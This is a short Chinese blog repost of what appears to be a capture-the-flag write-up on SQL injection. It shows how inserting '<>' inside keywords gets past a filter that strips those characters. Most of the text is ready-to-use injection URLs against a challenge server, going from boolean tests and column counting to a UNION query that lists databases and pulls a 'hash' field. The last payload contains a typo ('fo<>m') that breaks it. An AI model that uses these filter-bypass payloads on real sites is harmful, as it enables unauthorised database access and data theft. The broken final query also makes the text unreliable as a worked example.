[一] sqlinject bypass

Posted nul1

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[一] sqlinject bypass相关的知识,希望对你有一定的参考价值。

http://103.238.227.13:10087/?id=1

由源码来看是没有办法注入的,几乎都是过滤了的。但是经过测试加<>符号会被直接替换为空。

那么就可以借助此进行bypass

http://103.238.227.13:10087/?id=1 a<>nd 1=1%23

http://103.238.227.13:10087/?id=1 a<>nd 1=2%23

http://103.238.227.13:10087/?id=1 o<>rder b<>y 2%23 得是2

查看所有库

http://103.238.227.13:10087/?id=-1%20un%3C%3Eion%20se%3C%3Elect%201,concat(group_concat(distinct+schema_name))%20fr%3C%3Eom%20info%3C%3Ermation_schema.schemata--+

得到两个库information_schema、sql3

第一个是系统默认的那么直接上sql3。题目当中说在sql3这个表里的hash字段当中。那么直接

http://103.238.227.13:10087/?id=-1 uni<>on selec<>t  1,hash fo<>m sql3.key%23

 

以上是关于[一] sqlinject bypass的主要内容,如果未能解决你的问题,请参考以下文章

Checkmarx 高亮代码为 sqlinjection 漏洞

20165207 Exp9 Web安全基础

将参数传递给方法时将标记查询强化为 sqlInjection

阅读sqlmap源代码,编写burpsuite插件--sqlmapapi

阅读sqlmap源代码,编写burpsuite插件--sqlmapapi

卖座网一处SQL注射(Http Referer sqlinjection)